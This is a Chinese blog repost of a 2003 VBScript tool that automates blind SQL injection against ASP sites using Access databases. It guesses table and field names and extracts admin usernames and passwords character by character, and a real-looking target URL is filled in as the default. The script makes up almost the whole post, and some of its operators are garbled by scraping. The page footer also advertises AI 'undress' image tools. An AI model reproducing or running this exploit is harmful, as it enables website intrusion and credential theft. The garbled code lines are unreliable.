首页 数据库 mysql教程 SQL注入之脚本篇-FOR ACCESS数据库

SQL注入之脚本篇-FOR ACCESS数据库

Jun 07, 2016 pm 03:04 PM
access sql 数据库 注入

这个 脚本 写于2003年,终于能收到我自己的博客里了。如今这样的 注入 漏洞已经很少了,一是纯asp的站越来越少,二是成熟的站点多见,一些漏洞都被补得差不多了,此 脚本 可以封存起来了。。。^_^ ' SQL 注入 之 脚本 篇-FOR ACCESS 数据库 by 晴阳(Liuxy) '

这个脚本写于2003年,终于能收到我自己的博客里了。如今这样的注入漏洞已经很少了,一是纯asp的站越来越少,二是成熟的站点多见,一些漏洞都被补得差不多了,此脚本可以封存起来了。。。^_^

'     SQL注入脚本篇-FOR ACCESS数据库 by 晴阳(Liuxy)
'==========================================================================
'通过脚本对因过滤字符不严的asp页面进行自动攻击,能自动猜测常用表名,字段名和用户,密码

'经修改也能猜测其他不常见的表名,字段名和用户,密码,不过速度不会很快

'1->.攻击前检测是否存在漏洞。若URL="http://ip/list.asp?id=1"则可构造这样的URL来检测

'http://ip/list.asp?id=1 http://ip/list.asp?id=1 and 1=1 http://ip/list.asp?id=1 and 1=0

'若两种情况与返回的正文不一致,则表明一定存在sql注入漏洞~~~恭喜恭喜!

'2->.检测表名 通过提交http://ip/list.asp?id=1 and exists (select * from ptable)来检测是否存在表pTable

'3->.检测字段名 通过提交http://ip/list.asp?id=1 and 0(select count(pField) from ptable)

'4->.检测用户和密码    http://ip/list.asp?id=1 and exists (select * from Tablename where user'1') 这里的user为常用字段
                      'http://ip/list.asp?id=1 and exists (select * from Tablename where user=puser and len(pwd)>?)
                      'http://ip/list.asp?id=1 and exists (select * from Tablename where user=Username and asc(Mid(pwd,i))>?)

Dim Url,Bodytext,pTable,pField,passTable,passUser,passPass,pUser,pUserLen,pPwd,pPwdLen,pCheck,pnum
Dim CheckLen1,CheckLen2
Dim LenNumOk
Dim ErrorTable
ErrorTable="注入不成功!"
Dim TableFind()
        ReDim Preserve TableFind(0)
        TableFind(0)=""
Dim FieldFind()
        ReDim Preserve FieldFind(0)
        FieldFind(0)=""
Dim Table(3)
        Table(0)="admin"
        Table(1)="user"
        Table(2)="login"
        Table(3)="news"
Dim Field(11)
        Field(0)="name"
        Field(1)="user"
        Field(2)="username"
        Field(3)="pwd"
        Field(4)="pass"
        Field(5)="passwd"
        Field(6)="password"
            Field(7)="id"
        Field(8)="title"
        Field(9)="body"
        Field(10)="topic"
        Field(11)="board"
Function URLEncoding(vstrIn)    'URL编码函数
    strReturn = ""
    For i = 1 To Len(vstrIn)
        ThisChr = Mid(vStrIn,i,1)
        If Abs(Asc(ThisChr))             strReturn = strReturn & ThisChr
        Else
            innerCode = Asc(ThisChr)
            If innerCode                 innerCode = innerCode + &H10000
            End If
            Hight8 = (innerCode And &HFF00)\ &HFF
            Low8 = innerCode And &HFF
            strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
        End If
    Next
    URLEncoding = strReturn
End Function

Function bytes2BSTR(vIn) '用于解决无法正常显示汉字问题
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode             strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

'增加数组长度
Function AddLength(IDFind,Find)
    LenNum=ubound(IDFind)
    ReDim Preserve IDFind(LenNum+1)
    IDFind(LenNum)=Find
    IDFind(LenNum+1)=""
End Function

'输入待测试的网址
Wscript.Echo Chr(10)&"========Access数据库注入脚本(晴阳/Liuxy)========"
Url=InputBox("请输入可能存在漏洞的网址:"&Chr(10)&Chr(10)&"形如http://Localhost/SQL/index.asp?id=1","","http://www.dttt.com/showdown.asp?id=83")
'Bodytext=InputBox("请输入正常返回的地址:"&Chr(10)&Chr(10)&"这里输入正常返回时的正文"&Chr(10)&Chr(10)&"(取与错误页面中没有的部分)","","SN: z9j8-pum4n-c6gzq Key: rw2-7jw")
Wscript.Echo Chr(10)&"正在检查"&Url&"注入漏洞..."
Url=URLEncoding(Url)
pCheckSQLRes=pCheckSQL(Url)
IF pCheckSQLRes="False" Then
    Wscript.Echo Chr(10)&"========"&Url&"无注入漏洞.退出!========"
   Wscript.Quit
Else
    Wscript.Echo Chr(10)&"========存在漏洞,开始注入!========"
    Call RunInjection()
End IF

'注入部分
Function RunInjection()    
Dim CheckOK
   '依次猜测数组Table()中的表名
Wscript.Echo Chr(10)&"    ┌───开始猜测表名"&Chr(10)&"    │"
    IF pCheckTable(Url,ErrorTable)="True" Then
    Wscript.Echo "    ├───"&ErrorTable&Chr(10)&"    │"
    Wscript.Echo "    └───表名猜测完毕!"&Chr(10)
    Wscript.Echo Chr(10)&"========Access数据库注入脚本(晴阳/Liuxy)========"
    Exit Function
    End IF
   For i=0 to ubound(Table) step 1
   IF pCheckTable(Url,Table(i))="True" Then
    CheckOK="True"
    Call AddLength(TableFind,Table(i))
    Wscript.Echo "    ├───找到表"&Table(i)&Chr(10)&"    │"
    Else CheckOK="False"
    End IF
    IF CheckOK="True" Then
    Wscript.Echo "    │    ├───表"&Table(i)&"字段名"&Chr(10)&"    │"
          For j=0 to ubound(Field) step 1
    IF pCheckField(Url,Table(i),Field(j))="True" Then
    Wscript.Echo "    │         ├───"&Field(j)
    End IF
    Next
    End IF
    Next
    Wscript.Echo "    └───表名猜测完毕!"&Chr(10)
  
For i=0 to ubound(TableFind) step 1
    IF TableFind(i)="admin" Then
        pTableFind="True"
        Exit For
    End IF
Next

IF pTableFind="True"  Then
    Wscript.Echo "========开始查找表中用户密码========"
    '输入需要检测字段长度的表名,字段名
        pLenTable=InputBox("输入用户字段名:","脚本参数-表名","admin")
        pLenUser=InputBox("输入用户字段名:","脚本参数-用户字段名","user")
        pLenPass=InputBox("输入密码字段名:","脚本参数-密码字段名","pwd")

        Call pCheckLen1(Url,pLenTable,pLenUser,1,1,"0","30")
        Wscript.Echo "表"&pLenTable&"字段"&pLenUser&"中存在一个内容长为:"&pCheck
    For i=1 to pCheck Step 1
        Call pCheckLen1(Url,pLenTable,pLenUser,2,CStr(i),"32","127")
        pUser=pUser+Chr(pCheck)
    Wscript.Echo "查找用户"&pUser&"......"
    Next
    Wscript.Echo "表"&pLenTable&"字段"&pLenUser&"中存在一个内容:"&pUser
   
    Wscript.Echo "========开始查找用户"&pUser&"的密码:========"
    Call pCheckLen1(Url,pLenTable,pLenPass,1,1,"0","32")
        Wscript.Echo "表"&pLenTable&"字段"&pLenPass&"中存在一个内容长为:"&pCheck
    For i=1 to pCheck Step 1
        Call pCheckLen1(Url,pLenTable,pLenPass,2,CStr(i),"32","127")
        pPwd=pPwd+Chr(pCheck)
    Wscript.Echo "用户"&pUser&"的密码"&pPwd&"......"
    Next
    Wscript.Echo "表"&pLenTable&"字段"&pLenPass&"中存在一个内容:"&pPwd
   
End IF
    Wscript.Echo Chr(10)&"========Access数据库注入脚本(晴阳/Liuxy)========"
End Function

'主要部分,做入侵检测用的代码  ,构造入侵用Url
'============================================================
Function pPost(pUrl)   
    On Error Resume Next
    Set pRes = CreateObject("Microsoft.XMLHTTP")       
    pRes.open "POST",pUrl,false                        
    pRes.Send                                          
   '获取页面返回信息返回的正文中存在BodyText的话就表示猜测成功
        pRet=bytes2BSTR(pRes.responseBody)
        If instr(pRet, BodyText) > 0 Then
        pPost="True"
        Else
        pPost="False"
        End If 
    Set pRes = Nothing
End Function
'============================================================
Function pRetText(pUrl)
    On Error Resume Next
    Set pRes=CreateObject("Microsoft.XMLHTTP")
    pRes.open "POST",pUrl,False
    pRes.Send
    pRetText=bytes2BSTR(pRes.ResponseBody)
    Set pRes=Nothing
End Function   


'检测是否存在注入漏洞
Function pCheckSQL(pUrl)
    Dim Continuefind,BodyText1,BodyText2
    BodyText1=""
    BodyText2=""
    Dim pCheckSQL1,pCheckSQL2,pCheckSQL3
    pCheckSQL1=pRetText(pUrl)
    pCheckSQL2=pRetText(pUrl+" and 1=1")
    pCheckSQL3=pRetText(pUrl+" and 1=0")
    FOR i=1 to Len(pCheckSQL1) step 1
       IF Mid(pCheckSQL1,i,1)=Mid(pCheckSQL2,i,1) Then
        BodyText1=BodyText1+Mid(pCheckSQL1,i,1)
       Else
        Exit For
       End IF
    Next
    FOR j=1 to Len(pCheckSQL3) step 1
       IF Mid(pCheckSQL3,i,1)=Mid(pCheckSQL2,i,1) Then
        BodyText2=BodyText2+Mid(pCheckSQL3,i,1)
       Else
        Exit For
       End IF
    Next
       
    IF BodyText1BodyText2 Then
        pCheckSQL="True"
        BodyText=BodyText1
        'Msgbox "存在注入漏洞!"   
    Else
             pCheckSQL="False"
        'Msgbox "无漏洞,退出!"       
    End IF
End Function
'=============================================================

'检测常用表名
Function pCheckTable(pUrl,pTable)
         CheckTable=pPost(pUrl+" and exists (select * from "+pTable+")")
      IF CheckTable="True" Then
         pCheckTable="True"
      End IF
End Function

'检测常用字段名
Function pCheckField(pUrl,pTable,pField)
             CheckField=pPost(pUrl+" and 0(select count("+pField+") from "+pTable+")")
         IF CheckField="True" Then
               pCheckField="True"
         End IF
End Function

Function pCheckLen1(pUrl,pTable,pField,pCheckStyle,pnum,m,n) '用来检测pField的长度和内容
    IF pCheckStyle=1 Then pCheckStr="Len("+pField+")"
    IF pCheckStyle=2 Then pCheckStr="Asc(Mid("+pField+","+pnum+",1))"
   
       
    IF pPost(pUrl+" and exists (select top 1 * from "+pTable+" where "+pCheckStr+""+n+")")="True" Then
        Wscript.Echo  pField1&"中没有找到内容!"
    End IF
   
    IF pPost(pUrl+" and exists (select top 1 * from "+pTable+" where "+pCheckStr+"="+m+")")="True" Then  pCheck=CInt(m):Exit Function
    IF pPost(pUrl+" and exists (select top 1 * from "+pTable+" where "+pCheckStr+"="+n+")")="True" Then  pCheck=CInt(n):Exit Function
        mn=CStr((CInt(n)+CInt(m))/2)
    IF pPost(pUrl+" and exists (select top 1 * from "+pTable+" where "+pCheckStr+">"+m+" and "+pCheckStr+"    'Wscript.Echo pUrl+" and exists (select top 1 * from "+pTable+" where "+pCheckStr+">"+m+" and "+pCheckStr+"        Call pCheckLen1(pUrl,pTable,pField,pCheckStyle,pnum,m,mn)
    Else
        Call pCheckLen1(pUrl,pTable,pField,pCheckStyle,pnum,mn,n)
    End IF
End Function

本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

Video Face Swap

Video Face Swap

使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

apache怎么配置zend apache怎么配置zend Apr 13, 2025 pm 12:57 PM

如何在 Apache 中配置 Zend?在 Apache Web 服务器中配置 Zend Framework 的步骤如下:安装 Zend Framework 并解压到 Web 服务器目录中。创建 .htaccess 文件。创建 Zend 应用程序目录并添加 index.php 文件。配置 Zend 应用程序(application.ini)。重新启动 Apache Web 服务器。

apache服务器是什么 apache服务器是干嘛的 apache服务器是什么 apache服务器是干嘛的 Apr 13, 2025 am 11:57 AM

Apache服务器是强大的Web服务器软件,充当浏览器与网站服务器间的桥梁。1. 它处理HTTP请求,根据请求返回网页内容;2. 模块化设计允许扩展功能,例如支持SSL加密和动态网页;3. 配置文件(如虚拟主机配置)需谨慎设置,避免安全漏洞,并需优化性能参数,例如线程数和超时时间,才能构建高性能、安全的Web应用。

Nginx性能监控与故障排查工具使用 Nginx性能监控与故障排查工具使用 Apr 13, 2025 pm 10:00 PM

Nginx性能监控与故障排查主要通过以下步骤进行:1.使用nginx-V查看版本信息,并启用stub_status模块监控活跃连接数、请求数和缓存命中率;2.利用top命令监控系统资源占用,iostat和vmstat分别监控磁盘I/O和内存使用情况;3.使用tcpdump抓包分析网络流量,排查网络连接问题;4.合理配置worker进程数,避免并发处理能力不足或进程上下文切换开销过大;5.正确配置Nginx缓存,避免缓存大小设置不当;6.通过分析Nginx日志,例如使用awk和grep命令或ELK

MySQL与其他数据库:比较选项 MySQL与其他数据库:比较选项 Apr 15, 2025 am 12:08 AM

MySQL适合Web应用和内容管理系统,因其开源、高性能和易用性而受欢迎。1)与PostgreSQL相比,MySQL在简单查询和高并发读操作上表现更好。2)相较Oracle,MySQL因开源和低成本更受中小企业青睐。3)对比MicrosoftSQLServer,MySQL更适合跨平台应用。4)与MongoDB不同,MySQL更适用于结构化数据和事务处理。

甲骨文在商业世界中的作用 甲骨文在商业世界中的作用 Apr 23, 2025 am 12:01 AM

Oracle不仅是数据库公司,还是云计算和ERP系统的领导者。1.Oracle提供从数据库到云服务和ERP系统的全面解决方案。2.OracleCloud挑战AWS和Azure,提供IaaS、PaaS和SaaS服务。3.Oracle的ERP系统如E-BusinessSuite和FusionApplications帮助企业优化运营。

使用DICR/YII2-Google将Google API集成在YII2中 使用DICR/YII2-Google将Google API集成在YII2中 Apr 18, 2025 am 11:54 AM

vProcesserazrabotkiveb被固定,мнелостольностьстьс粹馏标д都LeavallySumballanceFriablanceFaumDoptoMatification,Čtookazalovnetakprosto,kakaožidal.posenesko

现实世界Mysql:示例和用例 现实世界Mysql:示例和用例 Apr 14, 2025 am 12:15 AM

MySQL在现实世界的应用包括基础数据库设计和复杂查询优化。1)基本用法:用于存储和管理用户数据,如插入、查询、更新和删除用户信息。2)高级用法:处理复杂业务逻辑,如电子商务平台的订单和库存管理。3)性能优化:通过合理使用索引、分区表和查询缓存来提升性能。

nginx限流怎么解决 nginx限流怎么解决 Apr 14, 2025 pm 12:06 PM

Nginx 限流问题可通过以下方法解决:使用 ngx_http_limit_req_module 限制请求次数;使用 ngx_http_limit_conn_module 限制连接数;使用第三方模块(ngx_http_limit_connections_module、ngx_http_limit_rate_module、ngx_http_access_module)实现更多限流策略;使用云服务(Cloudflare、Google Cloud Rate Limiting、AWS WAF)进行 DD

See all articles